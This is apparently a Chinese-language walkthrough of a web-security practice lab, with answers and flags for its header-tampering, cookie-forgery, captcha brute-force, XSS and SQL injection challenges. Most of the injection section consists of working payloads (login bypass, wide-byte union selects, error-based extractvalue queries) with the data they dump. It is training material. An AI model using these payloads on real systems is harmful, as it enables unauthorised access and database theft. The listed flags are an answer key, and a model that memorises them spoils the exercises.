基础关
key在哪里?
查看页面源代码
再加密一次你就得到key啦~
xrlvf23xfqwsxsqf
rot13解码
keyis23ksdjfkfds
猜猜这是经过了多少次加密?
不断base64解码,若干次后得到key
key is jkljdkl232jkljkdl2389
据说MD5加密很安全,真的是么?
种族歧视
burpsuite抓包,改包,Accept-Language:改为以下内容
Accept-Language:en-US;q=0.3,en;q=0.2
key is: *(TU687jksf6&*
HAHA浏览器
burpsuite抓包,改包,User-Agent字段加上 HAHA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 HAHA
key is: meiyouHAHAliulanqi
key究竟在哪里呢?
F12 查看网络,在响应头发现key
key:kjh%#$#%FDjjj
key又找不到了
浏览器访问会发生重定向,burpsuite抓包修改请求头
key: ohHTTP302dd
冒充登陆用户
burpsuite抓包修改请求头,添加Cookie: Login=1
key is: yescookieedit7823789KJ
比较数字大小
F12修改元素 maxlength="3" 改为4 输入4位数得到key
key is 768HKyu678567&*&K
本地的诱惑
查看源代码得key
就不让你访问
查看robots.txt
访问Disallow: /9fb97531fe95594603aff7e794ab2f5f/
http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/
you find me,but I am not the login page. keep search.
访问login.php
right! key is UIJ%%IOOqweqwsdf
脚本关
key又又找不到了
burpsuite抓包改包
key is : yougotit_script_now
快速口算
import requests
import re
url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
header = {'Cookie': 'PHPSESSID=$db3879ed8a244c77c04f65082042850c'}
resp_content = requests.get(url, headers=header).content.decode('utf-8')
matches = re.search("(.*)=<input", resp_content)
data = {'v': str(eval(matches.group(1)))}
resp_content = requests.post(
url, headers=header, data=data).content.decode('utf-8')
matches = re.search("<body>(.*)</body>", resp_content)
print(matches.group(1))
PHPSESSID的值不同,可以抓包查看PHPSESSID的值
这个题目是空的
空的
null,提交null
怎么就是不弹出key呢?
https://blog.csdn.net/a954680384/article/details/51456430
https://blog.csdn.net/qq_40980391/article/details/81161836
逗比验证码第一期
burpsuite暴力破解
逗比验证码第二期
https://blog.csdn.net/Selukwe/article/details/72802735
逗比的验证码第三期(SESSION)
同第二关burpsuite爆破
https://blog.csdn.net/qq_40980391/article/details/81161904
key is LJLJLfuckvcodesdf#@sd
微笑一下就能过关了
https://blog.csdn.net/qq_26090065/article/details/82503651
逗比的手机验证码
13388886666 收验证码
13388886667 登录
key is LJLJLGod!@@sd
基情燃烧的岁月
bp爆破
验证码识别
XSS基础关
禁用浏览器JavaScript,查看源代码
提示
alert("Please use alert(HackingLab)!!");
提交
key is: myxssteststart!
XSS基础2:简单绕过
被过滤了
key is: xss2test2you
XSS基础3:检测与构造
Principle很重要的XSS
https://www.meetsec.cn/index.php/archives/8/
注入关
最简单的SQL注入
Tips:
用户名处提交
admin' or 'a'='a
admin' or 1=1#
admin' or 'a'='a'#
密码随意
登录成功!我的座右铭(flag)是iamflagsafsfskdf11223
最简单的SQL注入(熟悉注入环境)
查看源代码得到tips:id=1
?id=1 无回显
?id=1 or 1=1 有回显
得到 flag HKGGflagdfs56757fsdv
防注入
宽字节注入 ?id=1%df'
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1�' order by 4%23
报错了,所以只有3列
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1�' union select 1,2,3 %23
有回显
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1�' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 %23
查表名,得到表名:
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1�' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655f757365725f73716c6934),3 %23
列名 id,title_1,content_1
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1�' union select 1,(select group_concat(id,title_1,content_1) from sae_user_sqli4),3 %23
1blog systemmy blog test,2so easyeasy ,229212flagishere#Hsaagdfs56sdf7fsdv,3where is flagflag is here!
到底能不能回显
limit配合procedure analyse()函数,procedure analyse()函数是MySQL内置的对MySQL字段值进行统计分析后给出建议的字段类型
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23 &num=1%23
得出 article,user两个表
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23 &num=1%23
得到列名id,username,password,lastloginI
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(username,password) from user))),1)%23 &num=1%23
useruser,adminadmin,flagmyflagi
没有显示完
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(username,password) from user where username=0x666c6167))),1)%23 &num=1%23
flagmyflagishere
dog1.jpg存在宽字节注入,提交dog1.jpg%df'可以证明,响应包返回结果如下
在burpsuite中注入
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' order by 5 %23 HTTP/1.1
//报错 有4列
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,3,4 %23 HTTP/1.1
//返回3,回显在第3个位置
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,database(),4 %23 HTTP/1.1
//得到数据库 mydbs
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x6d79646273 %23 HTTP/1.1
//表名 article,pic
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x61727469636c65 %23 HTTP/1.1
//article 中的列为 id,title,content,others
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x706963 %23 HTTP/1.1
//pic 中的列为 id,picname,data,text
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(picname),4 from pic %23 HTTP/1.1
//查看picname列
//dog1.jpg,cat1.jpg,flagishere_askldjfklasjdfl.jpg
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg
访问图片得flag IamflagIloveyou!
ErrorBased
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin%27%20and%20(extractvalue(1,concat(0x7e,(select%20(SELECT%20distinct%20concat(0x3a,username,0x3a,motto,0x3a,0x3a)%20FROM%20motto%20limit%203,1)),0x7e)))%23
盲注
https://blog.csdn.net/weixin_41924764/article/details/107095963
SQL注入通用防护
https://www.cnblogs.com/Ragd0ll/p/8614916.html
据说哈希后的密码是不能产生注入的
https://www.cnblogs.com/Ragd0ll/p/8614916.html
上传关
https://www.meetsec.cn/index.php/archives/9/
https://www.jianshu.com/p/b73c8910abd1
综合关
https://www.meetsec.cn/index.php/archives/11/